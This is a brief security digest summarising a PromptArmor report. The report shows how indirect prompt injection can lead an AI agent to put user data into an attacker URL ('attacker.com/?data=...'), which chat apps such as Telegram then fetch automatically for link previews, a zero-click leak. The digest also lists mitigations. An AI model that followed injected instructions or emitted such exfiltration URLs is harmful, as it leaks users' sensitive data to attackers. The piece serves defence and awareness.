PromptArmor — Link preview data exfiltration in agent chats
AI relevance: Agent responses that include attacker-controlled URLs can leak sensitive data when chat apps auto-fetch link previews, turning indirect prompt injection into zero-click exfiltration for AI systems.
- PromptArmor documents a link-preview exfiltration chain where messaging apps (Slack, Telegram, etc.) fetch URL previews embedded in AI agent responses.
- Indirect prompt injection can coerce the agent to generate a URL like
attacker.com/?data=...that contains sensitive user data in the query string. - When previews are enabled, the chat app automatically requests the URL to build the preview, exposing the appended data without any user clicks.
- The report notes OpenClaw + Telegram is vulnerable by default because Telegram previews are on unless explicitly disabled.
- PromptArmor provides a test harness (AITextRisk.com) to validate whether specific agent/app pairings trigger preview requests and leak data.
- A documented mitigation is to disable link previews in the agent’s chat integration; PromptArmor shows an explicit OpenClaw config example.
- The broader takeaway: preview behavior is a platform control, so safe defaults require both app-level settings and agent-side awareness.
Why it matters
- Link previews convert classic “user must click” exfiltration into zero-click data leakage, shrinking the window to detect abuse.
- Agents are increasingly deployed in chat tools where previews are default-on, so the risk is likely widespread across real-world AI ops.
- This is a concrete example of how UI/UX features can become security-critical attack surfaces for AI systems.
What to do
- Disable link previews for agent channels wherever possible (Telegram/Slack/Teams).
- Test your agent integrations using PromptArmor’s preview-leak test to confirm whether previews are generated.
- Constrain agent output to reduce the chance of emitting attacker-controlled URLs with sensitive query parameters.
- Log outbound preview requests at the network layer so you can detect unexpected exfiltration patterns.